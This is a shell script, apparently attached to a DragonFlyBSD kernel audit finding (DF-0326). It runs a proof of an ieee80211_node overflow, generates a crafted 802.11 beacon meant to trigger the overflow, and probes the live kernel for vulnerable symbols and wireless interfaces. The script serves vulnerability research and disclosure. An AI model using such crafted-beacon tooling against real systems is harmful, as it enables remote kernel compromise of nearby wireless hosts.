DragonFlyBSD Kernel Audit
DF-0326 / run.sh
← back to finding ↓ download raw
#!/bin/sh
# DF-0326 run script.
# 1) code-level overflow proof (userspace replica of struct ieee80211_node tail)
# 2) crafted-beacon generator (raw 802.11 frame bytes -> beacon.bin)
# 3) reachability/environment probe on the live kernel
set -e
cd "$(dirname "$0")"
echo "===== node_overflow (code-level proof) ====="
./node_overflow
echo
echo "===== beacon_gen 192 > beacon.bin ====="
./beacon_gen 192 > beacon.bin
echo "first 96 bytes of the crafted beacon (hexdump -C):"
hexdump -C beacon.bin | head -6
echo "beacon.bin size:"
ls -l beacon.bin
echo "--- decode: byte at offset 0x26 (38) is fc0 subtype, SSID IE tag+len at body offset 0x18..0x19 ---"
echo
echo "===== live-kernel reachability probe ====="
echo "--- vulnerable symbols in /boot/kernel/kernel (T = live text) ---"
nm /boot/kernel/kernel 2>/dev/null | grep -iE 'ieee80211_sta_join|ieee80211_init_neighbor|ieee80211_add_scan' || echo "(nm not available or symbols absent)"
echo "--- SSID_INVALID status flag consumers (should be NONE) ---"
echo "grep -c BPARSE_SSID_INVALID across the wlan tree: live kernel is closed-source; see env.txt host-side analysis"
echo "--- 802.11 interfaces present (radio check) ---"
ifconfig -l
echo "RUN_OK"